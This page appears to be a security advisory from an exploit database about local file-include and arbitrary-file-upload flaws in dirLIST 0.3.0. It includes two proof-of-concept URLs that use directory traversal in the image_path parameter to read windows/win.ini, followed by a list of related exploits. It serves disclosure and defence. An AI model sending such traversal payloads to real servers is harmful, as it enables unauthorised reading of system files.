source: http://www.securityfocus.com/bid/54933/info dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
Related Exploits
Trying to match setup file: 3133e43f7dbeae5f2b7e83a19b910e42Other Possible E-DB Search Terms: dirLIST 0.3.0, dirLIST
Date | D | V | Title | Author |
---|---|---|---|---|
2017-01-17 |
![]() |
dirLIST 0.3.0 - Arbitrary File Upload | hyp3rlinx | |
2007-10-01 |
![]() |
smbftpd 0.96 - SMBDirList-function Remote Format String | Jerry Illik... |